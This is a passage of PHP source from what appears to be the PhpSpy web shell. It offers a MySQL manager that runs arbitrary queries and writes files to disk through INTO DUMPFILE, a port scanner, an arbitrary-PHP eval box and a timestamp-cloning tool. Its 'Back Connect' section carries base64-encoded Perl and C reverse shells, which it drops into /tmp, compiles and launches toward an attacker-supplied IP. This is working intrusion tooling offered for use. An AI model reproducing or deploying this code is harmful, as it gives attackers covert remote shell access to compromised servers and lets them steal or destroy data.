721 $mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
722 $result = q("SELECT 0x{$contents} FROM mysql.user INTO DUMPFILE '$savepath';");
723 m($result ? 'Upload success' : 'Upload has failed: '.mysql_error());
724 }
725 }
726 }
727?>
728<script type="text/javascript">
729function mysqlfile(doing){
730 if(!doing) return;
731 $('doing').value=doing;
732 $('mysqlfile').dbhost.value=$('dbinfo').dbhost.value;
733 $('mysqlfile').dbport.value=$('dbinfo').dbport.value;
734 $('mysqlfile').dbuser.value=$('dbinfo').dbuser.value;
735 $('mysqlfile').dbpass.value=$('dbinfo').dbpass.value;
736 $('mysqlfile').dbname.value=$('dbinfo').dbname.value;
737 $('mysqlfile').charset.value=$('dbinfo').charset.value;
738 $('mysqlfile').submit();
739}
740</script>
741<?php
742 !$dbhost && $dbhost = 'localhost';
743 !$dbuser && $dbuser = 'root';
744 !$dbport && $dbport = '3306';
745 formhead(array('title'=>'MYSQL Information','name'=>'dbinfo'));
746 makehide('action','sqlfile');
747 p('<p>');
748 p('DBHost:');
749 makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));
750 p(':');
751 makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport));
752 p('DBUser:');
753 makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));
754 p('DBPass:');
755 makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));
756 p('DBName:');
757 makeinput(array('name'=>'dbname','size'=>15,'value'=>$dbname));
758 p('DBCharset:');
759 makeselect(array('name'=>'charset','option'=>$charsetdb,'selected'=>$charset,'nokey'=>1));
760 p('</p>');
761 formfoot();
762 p('<form action="'.$self.'" method="POST" enctype="multipart/form-data" name="mysqlfile" id="mysqlfile">');
763 p('<h2>Upload file</h2>');
764 p('<p><b>This operation the DB user must has FILE privilege</b></p>');
765 p('<p>Save path(fullpath): <input class="input" name="savepath" size="45" type="text" /> Choose a file: <input class="input" name="uploadfile" type="file" /> <a href="javascript:mysqlfile(\'mysqlupload\');">Upload</a></p>');
766 p('<h2>Download file</h2>');
767 p('<p>File: <input class="input" name="mysqldlfile" size="115" type="text" /> <a href="javascript:mysqlfile(\'mysqldown\');">Download</a></p>');
768 makehide('dbhost');
769 makehide('dbport');
770 makehide('dbuser');
771 makehide('dbpass');
772 makehide('dbname');
773 makehide('charset');
774 makehide('doing');
775 makehide('action','sqlfile');
776 p('</form>');
777}
778
779elseif ($action == 'mysqladmin') {
780 !$dbhost && $dbhost = 'localhost';
781 !$dbuser && $dbuser = 'root';
782 !$dbport && $dbport = '3306';
783 $dbform = '<input type="hidden" id="connect" name="connect" value="1" />';
784 if(isset($dbhost)){
785 $dbform .= "<input type=\"hidden\" id=\"dbhost\" name=\"dbhost\" value=\"$dbhost\" />\n";
786 }
787 if(isset($dbuser)) {
788 $dbform .= "<input type=\"hidden\" id=\"dbuser\" name=\"dbuser\" value=\"$dbuser\" />\n";
789 }
790 if(isset($dbpass)) {
791 $dbform .= "<input type=\"hidden\" id=\"dbpass\" name=\"dbpass\" value=\"$dbpass\" />\n";
792 }
793 if(isset($dbport)) {
794 $dbform .= "<input type=\"hidden\" id=\"dbport\" name=\"dbport\" value=\"$dbport\" />\n";
795 }
796 if(isset($dbname)) {
797 $dbform .= "<input type=\"hidden\" id=\"dbname\" name=\"dbname\" value=\"$dbname\" />\n";
798 }
799 if(isset($charset)) {
800 $dbform .= "<input type=\"hidden\" id=\"charset\" name=\"charset\" value=\"$charset\" />\n";
801 }
802
803 if ($doing == 'backupmysql' && $saveasfile) {
804 if (!$table) {
805 m('Please choose the table');
806 } else {
807 $mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
808 $fp = @fopen($path,'w');
809 if ($fp) {
810 foreach($table as $k => $v) {
811 if ($v) {
812 sqldumptable($v, $fp);
813 }
814 }
815 fclose($fp);
816 $fileurl = str_replace(SA_ROOT,'',$path);
817 m('Database has success backup to <a href="'.$fileurl.'" target="_blank">'.$path.'</a>');
818 mysql_close();
819 } else {
820 m('Backup failed');
821 }
822 }
823 }
824 if ($insert && $insertsql) {
825 $keystr = $valstr = $tmp = '';
826 foreach($insertsql as $key => $val) {
827 if ($val) {
828 $keystr .= $tmp.$key;
829 $valstr .= $tmp."'".addslashes($val)."'";
830 $tmp = ',';
831 }
832 }
833 if ($keystr && $valstr) {
834 $mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
835 m(q("INSERT INTO $tablename ($keystr) VALUES ($valstr)") ? 'Insert new record of success' : mysql_error());
836 }
837 }
838 if ($update && $insertsql && $base64) {
839 $valstr = $tmp = '';
840 foreach($insertsql as $key => $val) {
841 $valstr .= $tmp.$key."='".addslashes($val)."'";
842 $tmp = ',';
843 }
844 if ($valstr) {
845 $where = base64_decode($base64);
846 $mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
847 m(q("UPDATE $tablename SET $valstr WHERE $where LIMIT 1") ? 'Record updating' : mysql_error());
848 }
849 }
850 if ($doing == 'del' && $base64) {
851 $where = base64_decode($base64);
852 $delete_sql = "DELETE FROM $tablename WHERE $where";
853 $mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
854 m(q("DELETE FROM $tablename WHERE $where") ? 'Deletion record of success' : mysql_error());
855 }
856
857 if ($tablename && $doing == 'drop') {
858 $mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
859 if (q("DROP TABLE $tablename")) {
860 m('Drop table of success');
861 $tablename = '';
862 } else {
863 m(mysql_error());
864 }
865 }
866
867 formhead(array('title'=>'MYSQL Manager'));
868 makehide('action','mysqladmin');
869 p('<p>');
870 p('DBHost:');
871 makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));
872 p(':');
873 makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport));
874 p('DBUser:');
875 makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));
876 p('DBPass:');
877 makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));
878 p('DBCharset:');
879 makeselect(array('name'=>'charset','option'=>$charsetdb,'selected'=>$charset,'nokey'=>1));
880 makeinput(array('name'=>'connect','value'=>'Connect','type'=>'submit','class'=>'bt'));
881 p('</p>');
882 formfoot();
883
884 //²Ù×÷¼Ç¼
885 formhead(array('name'=>'recordlist'));
886 makehide('doing');
887 makehide('action','mysqladmin');
888 makehide('base64');
889 makehide('tablename');
890 p($dbform);
891 formfoot();
892
893 //Ñ¡¶¨Êý¾Ý¿â
894 formhead(array('name'=>'setdbname'));
895 makehide('action','mysqladmin');
896 p($dbform);
897 if (!$dbname) {
898 makehide('dbname');
899 }
900 formfoot();
901
902 //Ñ¡¶¨±í
903 formhead(array('name'=>'settable'));
904 makehide('action','mysqladmin');
905 p($dbform);
906 makehide('tablename');
907 makehide('page',$page);
908 makehide('doing');
909 formfoot();
910
911 $cachetables = array();
912 $pagenum = 30;
913 $page = intval($page);
914 if($page) {
915 $start_limit = ($page - 1) * $pagenum;
916 } else {
917 $start_limit = 0;
918 $page = 1;
919 }
920 if (isset($dbhost) && isset($dbuser) && isset($dbpass) && isset($connect)) {
921 $mysqllink = mydbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
922 //»ñÈ¡Êý¾Ý¿âÐÅÏ¢
923 $mysqlver = mysql_get_server_info();
924 p('<p>MySQL '.$mysqlver.' running in '.$dbhost.' as '.$dbuser.'@'.$dbhost.'</p>');
925 $highver = $mysqlver > '4.1' ? 1 : 0;
926
927 //»ñÈ¡Êý¾Ý¿â
928 $query = q("SHOW DATABASES");
929 $dbs = array();
930 $dbs[] = '-- Select a database --';
931 while($db = mysql_fetch_array($query)) {
932 $dbs[$db['Database']] = $db['Database'];
933 }
934 makeselect(array('title'=>'Please select a database:','name'=>'db[]','option'=>$dbs,'selected'=>$dbname,'onchange'=>'moddbname(this.options[this.selectedIndex].value)','newline'=>1));
935 $tabledb = array();
936 if ($dbname) {
937 p('<p>');
938 p('Current dababase: <a href="javascript:moddbname(\''.$dbname.'\');">'.$dbname.'</a>');
939 if ($tablename) {
940 p(' | Current Table: <a href="javascript:settable(\''.$tablename.'\');">'.$tablename.'</a> [ <a href="javascript:settable(\''.$tablename.'\', \'insert\');">Insert</a> | <a href="javascript:settable(\''.$tablename.'\', \'structure\');">Structure</a> | <a href="javascript:settable(\''.$tablename.'\', \'drop\');">Drop</a> ]');
941 }
942 p('</p>');
943 mysql_select_db($dbname);
944
945 $getnumsql = '';
946 $runquery = 0;
947 if ($sql_query) {
948 $runquery = 1;
949 }
950 $allowedit = 0;
951 if ($tablename && !$sql_query) {
952 $sql_query = "SELECT * FROM $tablename";
953 $getnumsql = $sql_query;
954 $sql_query = $sql_query." LIMIT $start_limit, $pagenum";
955 $allowedit = 1;
956 }
957 p('<form action="'.$self.'" method="POST">');
958 p('<p><table width="200" border="0" cellpadding="0" cellspacing="0"><tr><td colspan="2">Run SQL query/queries on database '.$dbname.':</td></tr><tr><td><textarea name="sql_query" class="area" style="width:600px;height:50px;overflow:auto;">'.htmlspecialchars($sql_query,ENT_QUOTES).'</textarea></td><td style="padding:0 5px;"><input class="bt" style="height:50px;" name="submit" type="submit" value="Query" /></td></tr></table></p>');
959 makehide('tablename', $tablename);
960 makehide('action','mysqladmin');
961 p($dbform);
962 p('</form>');
963 if ($tablename || ($runquery && $sql_query)) {
964 if ($doing == 'structure') {
965 $result = q("SHOW FULL COLUMNS FROM $tablename");
966 $rowdb = array();
967 while($row = mysql_fetch_array($result)) {
968 $rowdb[] = $row;
969 }
970 p('<h3>Structure</h3>');
971 p('<table border="0" cellpadding="3" cellspacing="0">');
972 p('<tr class="head">');
973 p('<td>Field</td>');
974 p('<td>Type</td>');
975 p('<td>Collation</td>');
976 p('<td>Null</td>');
977 p('<td>Key</td>');
978 p('<td>Default</td>');
979 p('<td>Extra</td>');
980 p('<td>Privileges</td>');
981 p('<td>Comment</td>');
982 p('</tr>');
983 foreach ($rowdb as $row) {
984 $thisbg = bg();
985 p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
986 p('<td>'.$row['Field'].'</td>');
987 p('<td>'.$row['Type'].'</td>');
988 p('<td>'.$row['Collation'].'&nbsp;</td>');
989 p('<td>'.$row['Null'].'&nbsp;</td>');
990 p('<td>'.$row['Key'].'&nbsp;</td>');
991 p('<td>'.$row['Default'].'&nbsp;</td>');
992 p('<td>'.$row['Extra'].'&nbsp;</td>');
993 p('<td>'.$row['Privileges'].'&nbsp;</td>');
994 p('<td>'.$row['Comment'].'&nbsp;</td>');
995 p('</tr>');
996 }
997 tbfoot();
998 $result = q("SHOW INDEX FROM $tablename");
999 $rowdb = array();
1000 while($row = mysql_fetch_array($result)) {
1001 $rowdb[] = $row;
1002 }
1003 p('<h3>Indexes</h3>');
1004 p('<table border="0" cellpadding="3" cellspacing="0">');
1005 p('<tr class="head">');
1006 p('<td>Keyname</td>');
1007 p('<td>Type</td>');
1008 p('<td>Unique</td>');
1009 p('<td>Packed</td>');
1010 p('<td>Seq_in_index</td>');
1011 p('<td>Field</td>');
1012 p('<td>Cardinality</td>');
1013 p('<td>Collation</td>');
1014 p('<td>Null</td>');
1015 p('<td>Comment</td>');
1016 p('</tr>');
1017 foreach ($rowdb as $row) {
1018 $thisbg = bg();
1019 p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
1020 p('<td>'.$row['Key_name'].'</td>');
1021 p('<td>'.$row['Index_type'].'</td>');
1022 p('<td>'.($row['Non_unique'] ? 'No' : 'Yes').'&nbsp;</td>');
1023 p('<td>'.($row['Packed'] === null ? 'No' : $row['Packed']).'&nbsp;</td>');
1024 p('<td>'.$row['Seq_in_index'].'</td>');
1025 p('<td>'.$row['Column_name'].($row['Sub_part'] ? '('.$row['Sub_part'].')' : '').'&nbsp;</td>');
1026 p('<td>'.($row['Cardinality'] ? $row['Cardinality'] : 0).'&nbsp;</td>');
1027 p('<td>'.$row['Collation'].'&nbsp;</td>');
1028 p('<td>'.$row['Null'].'&nbsp;</td>');
1029 p('<td>'.$row['Comment'].'&nbsp;</td>');
1030 p('</tr>');
1031 }
1032 tbfoot();
1033 } elseif ($doing == 'insert' || $doing == 'edit') {
1034 $result = q('SHOW COLUMNS FROM '.$tablename);
1035 while ($row = mysql_fetch_array($result)) {
1036 $rowdb[] = $row;
1037 }
1038 $rs = array();
1039 if ($doing == 'insert') {
1040 p('<h2>Insert new line in '.$tablename.' table &raquo;</h2>');
1041 } else {
1042 p('<h2>Update record in '.$tablename.' table &raquo;</h2>');
1043 $where = base64_decode($base64);
1044 $result = q("SELECT * FROM $tablename WHERE $where LIMIT 1");
1045 $rs = mysql_fetch_array($result);
1046 }
1047 p('<form method="post" action="'.$self.'">');
1048 p($dbform);
1049 makehide('action','mysqladmin');
1050 makehide('tablename',$tablename);
1051 p('<table border="0" cellpadding="3" cellspacing="0">');
1052 foreach ($rowdb as $row) {
1053 if ($rs[$row['Field']]) {
1054 $value = htmlspecialchars($rs[$row['Field']]);
1055 } else {
1056 $value = '';
1057 }
1058 $thisbg = bg();
1059 p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
1060 if ($row['Key'] == 'UNI' || $row['Extra'] == 'auto_increment' || $row['Key'] == 'PRI') {
1061 p('<td><b>'.$row['Field'].'</b><br />'.$row['Type'].'</td><td>'.$value.'&nbsp;</td></tr>');
1062 } else {
1063 p('<td><b>'.$row['Field'].'</b><br />'.$row['Type'].'</td><td><textarea class="area" name="insertsql['.$row['Field'].']" style="width:500px;height:60px;overflow:auto;">'.$value.'</textarea></td></tr>');
1064 }
1065 }
1066 if ($doing == 'insert') {
1067 p('<tr class="'.bg().'"><td colspan="2"><input class="bt" type="submit" name="insert" value="Insert" /></td></tr>');
1068 } else {
1069 p('<tr class="'.bg().'"><td colspan="2"><input class="bt" type="submit" name="update" value="Update" /></td></tr>');
1070 makehide('base64', $base64);
1071 }
1072 p('</table></form>');
1073 } else {
1074 $querys = @explode(';',$sql_query);
1075 foreach($querys as $num=>$query) {
1076 if ($query) {
1077 p("<p><b>Query#{$num} : ".htmlspecialchars($query,ENT_QUOTES)."</b></p>");
1078 switch(qy($query))
1079 {
1080 case 0:
1081 p('<h2>Error : '.mysql_error().'</h2>');
1082 break;
1083 case 1:
1084 if (strtolower(substr($query,0,13)) == 'select * from') {
1085 $allowedit = 1;
1086 }
1087 if ($getnumsql) {
1088 $tatol = mysql_num_rows(q($getnumsql));
1089 $multipage = multi($tatol, $pagenum, $page, $tablename);
1090 }
1091 if (!$tablename) {
1092 $sql_line = str_replace(array("\r", "\n", "\t"), array(' ', ' ', ' '), trim(htmlspecialchars($query)));
1093 $sql_line = preg_replace("/\/\*[^(\*\/)]*\*\//i", " ", $sql_line);
1094 preg_match_all("/from\s+`{0,1}([\w]+)`{0,1}\s+/i",$sql_line,$matches);
1095 $tablename = $matches[1][0];
1096 }
1097
1098 /*********************/
1099 $getfield = q("SHOW COLUMNS FROM $tablename");
1100 $rowdb = array();
1101 $keyfied = ''; //Ö÷¼ü×Ö¶Î
1102 while($row = @mysql_fetch_assoc($getfield)) {
1103 $rowdb[$row['Field']]['Key'] = $row['Key'];
1104 $rowdb[$row['Field']]['Extra'] = $row['Extra'];
1105 if ($row['Key'] == 'UNI' || $row['Key'] == 'PRI') {
1106 $keyfied = $row['Field'];
1107 }
1108 }
1109 /*********************/
1110 //Ö±½Óä¯ÀÀ±í°´ÕÕÖ÷¼ü½µÐòÅÅÁÐ
1111 if ($keyfied && strtolower(substr($query,0,13)) == 'select * from') {
1112 $query = str_replace(" LIMIT ", " order by $keyfied DESC LIMIT ", $query);
1113 }
1114
1115 $result = q($query);
1116
1117 p($multipage);
1118 p('<table border="0" cellpadding="3" cellspacing="0">');
1119 p('<tr class="head">');
1120 if ($allowedit) p('<td>Action</td>');
1121 $fieldnum = @mysql_num_fields($result);
1122 for($i=0;$i<$fieldnum;$i++){
1123 $name = @mysql_field_name($result, $i);
1124 $type = @mysql_field_type($result, $i);
1125 $len = @mysql_field_len($result, $i);
1126 p("<td nowrap>$name<br><span>$type($len)".(($rowdb[$name]['Key'] == 'UNI' || $rowdb[$name]['Key'] == 'PRI') ? '<b> - PRIMARY</b>' : '').($rowdb[$name]['Extra'] == 'auto_increment' ? '<b> - Auto</b>' : '')."</span></td>");
1127 }
1128 p('</tr>');
1129
1130 while($mn = @mysql_fetch_assoc($result)){
1131 $thisbg = bg();
1132 p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
1133 $where = $tmp = $b1 = '';
1134 //Ñ¡È¡Ìõ¼þ×Ö¶ÎÓÃ
1135 foreach($mn as $key=>$inside){
1136 if ($inside) {
1137 //²éÕÒÖ÷¼ü¡¢Î¨Ò»ÊôÐÔ¡¢×Ô¶¯Ôö¼ÓµÄ×ֶΣ¬ÕÒµ½¾ÍÍ£Ö¹£¬·ñÔò×éºÏËùÓÐ×Ö¶Î×÷ΪÌõ¼þ¡£
1138 if ($rowdb[$key]['Key'] == 'UNI' || $rowdb[$key]['Extra'] == 'auto_increment' || $rowdb[$key]['Key'] == 'PRI') {
1139 $where = $key."='".addslashes($inside)."'";
1140 break;
1141 }
1142 $where .= $tmp.$key."='".addslashes($inside)."'";
1143 $tmp = ' AND ';
1144 }
1145 }
1146 //¶ÁÈ¡¼Ç¼ÓÃ
1147 foreach($mn as $key=>$inside){
1148 $b1 .= '<td nowrap>'.html_clean($inside).'&nbsp;</td>';
1149 }
1150 $where = base64_encode($where);
1151
1152 if ($allowedit) p('<td nowrap><a href="javascript:editrecord(\'edit\', \''.$where.'\', \''.$tablename.'\');">Edit</a> | <a href="javascript:editrecord(\'del\', \''.$where.'\', \''.$tablename.'\');">Del</a></td>');
1153
1154 p($b1);
1155 p('</tr>');
1156 unset($b1);
1157 }
1158 p('<tr class="head">');
1159 if ($allowedit) p('<td>Action</td>');
1160 $fieldnum = @mysql_num_fields($result);
1161 for($i=0;$i<$fieldnum;$i++){
1162 $name = @mysql_field_name($result, $i);
1163 $type = @mysql_field_type($result, $i);
1164 $len = @mysql_field_len($result, $i);
1165 p("<td nowrap>$name<br><span>$type($len)".(($rowdb[$name]['Key'] == 'UNI' || $rowdb[$name]['Key'] == 'PRI') ? '<b> - PRIMARY</b>' : '').($rowdb[$name]['Extra'] == 'auto_increment' ? '<b> - Auto</b>' : '')."</span></td>");
1166 }
1167 p('</tr>');
1168 tbfoot();
1169 p($multipage);
1170 break;
1171 case 2:
1172 $ar = mysql_affected_rows();
1173 p('<h2>affected rows : <b>'.$ar.'</b></h2>');
1174 break;
1175 }
1176 }
1177 }
1178 }
1179 } else {
1180 $query = q("SHOW TABLE STATUS");
1181 $table_num = $table_rows = $data_size = 0;
1182 $tabledb = array();
1183 while($table = mysql_fetch_array($query)) {
1184 $data_size = $data_size + $table['Data_length'];
1185 $table_rows = $table_rows + $table['Rows'];
1186 $table['Data_length'] = sizecount($table['Data_length']);
1187 $table_num++;
1188 $tabledb[] = $table;
1189 }
1190 $data_size = sizecount($data_size);
1191 unset($table);
1192 p('<table border="0" cellpadding="0" cellspacing="0">');
1193 p('<form action="'.$self.'" method="POST">');
1194 makehide('action','mysqladmin');
1195 p($dbform);
1196 p('<tr class="head">');
1197 p('<td width="2%" align="center">&nbsp;</td>');
1198 p('<td>Name</td>');
1199 p('<td>Rows</td>');
1200 p('<td>Data_length</td>');
1201 p('<td>Create_time</td>');
1202 p('<td>Update_time</td>');
1203 if ($highver) {
1204 p('<td>Engine</td>');
1205 p('<td>Collation</td>');
1206 }
1207 p('<td>Operate</td>');
1208 p('</tr>');
1209 foreach ($tabledb as $key => $table) {
1210 $thisbg = bg();
1211 p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
1212 p('<td align="center" width="2%"><input type="checkbox" name="table[]" value="'.$table['Name'].'" /></td>');
1213 p('<td><a href="javascript:settable(\''.$table['Name'].'\');">'.$table['Name'].'</a></td>');
1214 p('<td>'.$table['Rows'].'</td>');
1215 p('<td>'.$table['Data_length'].'</td>');
1216 p('<td>'.$table['Create_time'].'&nbsp;</td>');
1217 p('<td>'.$table['Update_time'].'&nbsp;</td>');
1218 if ($highver) {
1219 p('<td>'.$table['Engine'].'</td>');
1220 p('<td>'.$table['Collation'].'</td>');
1221 }
1222 p('<td><a href="javascript:settable(\''.$table['Name'].'\', \'insert\');">Insert</a> | <a href="javascript:settable(\''.$table['Name'].'\', \'structure\');">Structure</a> | <a href="javascript:settable(\''.$table['Name'].'\', \'drop\');">Drop</a></td>');
1223 p('</tr>');
1224 }
1225 p('<tr class="head">');
1226 p('<td width="2%" align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td>');
1227 p('<td>Name</td>');
1228 p('<td>Rows</td>');
1229 p('<td>Data_length</td>');
1230 p('<td>Create_time</td>');
1231 p('<td>Update_time</td>');
1232 if ($highver) {
1233 p('<td>Engine</td>');
1234 p('<td>Collation</td>');
1235 }
1236 p('<td>Operate</td>');
1237 p('</tr>');
1238 p('<tr class='.bg().'>');
1239 p('<td>&nbsp;</td>');
1240 p('<td>Total tables: '.$table_num.'</td>');
1241 p('<td>'.$table_rows.'</td>');
1242 p('<td>'.$data_size.'</td>');
1243 p('<td colspan="'.($highver ? 5 : 3).'">&nbsp;</td>');
1244 p('</tr>');
1245
1246 p("<tr class=\"".bg()."\"><td colspan=\"".($highver ? 9 : 7)."\"><input name=\"saveasfile\" value=\"1\" type=\"checkbox\" /> Save as file <input class=\"input\" name=\"path\" value=\"".SA_ROOT.$dbname.".sql\" type=\"text\" size=\"60\" /> <input class=\"bt\" type=\"submit\" value=\"Export selection table\" /></td></tr>");
1247 makehide('doing','backupmysql');
1248 formfoot();
1249 p("</table>");
1250 fr($query);
1251 }
1252 }
1253 }
1254 tbfoot();
1255 @mysql_close();
1256}//end mysql
1257
1258elseif ($action == 'backconnect') {
1259 !$yourip && $yourip = $_SERVER['REMOTE_ADDR'];
1260 !$yourport && $yourport = '12345';
1261 $usedb = array('perl'=>'perl','c'=>'c');
1262
1263 $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
1264 "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
1265 "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
1266 "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
1267 "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
1268 "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
1269 "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
1270 $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC".
1271 "BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb".
1272 "SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd".
1273 "KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ".
1274 "sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC".
1275 "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D".
1276 "QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp".
1277 "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
1278
1279 if ($start && $yourip && $yourport && $use){
1280 if ($use == 'perl') {
1281 cf('/tmp/angel_bc',$back_connect);
1282 $res = execute(which('perl')." /tmp/angel_bc $yourip $yourport &");
1283 } else {
1284 cf('/tmp/angel_bc.c',$back_connect_c);
1285 $res = execute('gcc -o /tmp/angel_bc /tmp/angel_bc.c');
1286 @unlink('/tmp/angel_bc.c');
1287 $res = execute("/tmp/angel_bc $yourip $yourport &");
1288 }
1289 m("Now script try connect to $yourip port $yourport ...");
1290 }
1291
1292 formhead(array('title'=>'Back Connect'));
1293 makehide('action','backconnect');
1294 p('<p>');
1295 p('Your IP:');
1296 makeinput(array('name'=>'yourip','size'=>20,'value'=>$yourip));
1297 p('Your Port:');
1298 makeinput(array('name'=>'yourport','size'=>15,'value'=>$yourport));
1299 p('Use:');
1300 makeselect(array('name'=>'use','option'=>$usedb,'selected'=>$use));
1301 makeinput(array('name'=>'start','value'=>'Start','type'=>'submit','class'=>'bt'));
1302 p('</p>');
1303 formfoot();
1304}//end
1305
1306elseif ($action == 'portscan') {
1307 !$scanip && $scanip = '127.0.0.1';
1308 !$scanport && $scanport = '21,25,80,110,135,139,445,1433,3306,3389,5631,43958';
1309 formhead(array('title'=>'Port Scan'));
1310 makehide('action','portscan');
1311 p('<p>');
1312 p('IP:');
1313 makeinput(array('name'=>'scanip','size'=>20,'value'=>$scanip));
1314 p('Port:');
1315 makeinput(array('name'=>'scanport','size'=>80,'value'=>$scanport));
1316 makeinput(array('name'=>'startscan','value'=>'Scan','type'=>'submit','class'=>'bt'));
1317 p('</p>');
1318 formfoot();
1319
1320 if ($startscan) {
1321 p('<h2>Result &raquo;</h2>');
1322 p('<ul class="info">');
1323 foreach(explode(',', $scanport) as $port) {
1324 $fp = @fsockopen($scanip, $port, $errno, $errstr, 1);
1325 if (!$fp) {
1326 p('<li>'.$scanip.':'.$port.' ------------------------ <span style="font-weight:bold;color:#f00;">Close</span></li>');
1327 } else {
1328 p('<li>'.$scanip.':'.$port.' ------------------------ <span style="font-weight:bold;color:#080;">Open</span></li>');
1329 @fclose($fp);
1330 }
1331 }
1332 p('</ul>');
1333 }
1334}
1335
1336elseif ($action == 'eval') {
1337 $phpcode = trim($phpcode);
1338 if($phpcode){
1339 if (!preg_match('#<\?#si', $phpcode)) {
1340 $phpcode = "<?php\n\n{$phpcode}\n\n?>";
1341 }
1342 eval("?".">$phpcode<?");
1343 }
1344 formhead(array('title'=>'Eval PHP Code'));
1345 makehide('action','eval');
1346 maketext(array('title'=>'PHP Code','name'=>'phpcode', 'value'=>$phpcode));
1347 p('<p><a href="http://w'.'ww.4ng'.'el.net/php'.'spy/pl'.'ugin/" target="_blank">Get plugins</a></p>');
1348 formfooter();
1349}//end eval
1350
1351elseif ($action == 'editfile') {
1352 if(file_exists($opfile)) {
1353 $fp=@fopen($opfile,'r');
1354 $contents=@fread($fp, filesize($opfile));
1355 @fclose($fp);
1356 $contents=htmlspecialchars($contents);
1357 }
1358 formhead(array('title'=>'Create / Edit File'));
1359 makehide('action','file');
1360 makehide('dir',$nowpath);
1361 makeinput(array('title'=>'Current File (import new file name and new file)','name'=>'editfilename','value'=>$opfile,'newline'=>1));
1362 maketext(array('title'=>'File Content','name'=>'filecontent','value'=>$contents));
1363 formfooter();
1364
1365 goback();
1366
1367}//end editfile
1368
1369elseif ($action == 'newtime') {
1370 $opfilemtime = @filemtime($opfile);
1371 //$time = strtotime("$year-$month-$day $hour:$minute:$second");
1372 $cachemonth = array('January'=>1,'February'=>2,'March'=>3,'April'=>4,'May'=>5,'June'=>6,'July'=>7,'August'=>8,'September'=>9,'October'=>10,'November'=>11,'December'=>12);
1373 formhead(array('title'=>'Clone folder/file was last modified time'));
1374 makehide('action','file');
1375 makehide('dir',$nowpath);
1376 makeinput(array('title'=>'Alter folder/file','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1));
1377 makeinput(array('title'=>'Reference folder/file (fullpath)','name'=>'tarfile','size'=>120,'newline'=>1));
1378 formfooter();
1379 formhead(array('title'=>'Set last modified'));
